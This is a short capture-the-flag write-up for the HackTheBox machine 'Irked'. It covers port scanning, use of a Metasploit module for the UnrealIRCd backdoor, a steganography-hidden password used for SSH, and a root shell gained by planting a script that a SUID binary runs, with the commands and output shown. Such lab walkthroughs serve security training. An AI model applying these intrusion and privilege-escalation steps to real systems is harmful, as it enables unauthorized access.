Irked @ HackTheBox
This short write-up is about Irked, a rather easy machine on hackthebox featuring an irc backdoor, some steganography and a simple abuse of a custom binary.
User Flag
The initial scan shows the following open ports:
22/tcp open tcpwrapped
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
36129/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)
Service Info: Host: irked.htb
We can see that the machine uses UnrealIRCd, which has a metasploit module available for some of its versions “unix/irc/unreal_ircd_3281_backdoor”. We run the module and quickly get a shell.
In the home folder of user “djmardov” inside “Documents” we find a file called “.backup” with the following content:
Super elite steg backup pw
It turns out there is a picture on the open web port which contains some data hidden by steganography with the password “UPupDOWNdownLRlrBAbaSSss”:
steghide -sf irked.jpeg
With the password we can log into ssh as djmardov and grab the user flag.
Root Flag
We start by looking for suid binaries with find / -perm -u=s -type f 2>/dev/null
and eventually find “/usr/bin/viewuser”. By executing the file we see that it expects a file:
djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-24 15:50 (:0)
djmardov pts/2 2019-04-27 03:19 (
sh: 1: /tmp/listusers: not found
By creating the file as a simple shell script we obtain a root shell:
djmardov@irked:~/Documents$ echo '#!/bin/bash' > /tmp/listusers
djmardov@irked:~/Documents$ echo '/bin/bash' >> /tmp/listusers
djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-24 15:50 (:0)
djmardov pts/2 2019-04-27 03:19 (
root@irked:~/Documents# whoami
root@irked:~/Documents# wc -l /root/root.txt
1 /root/root.txt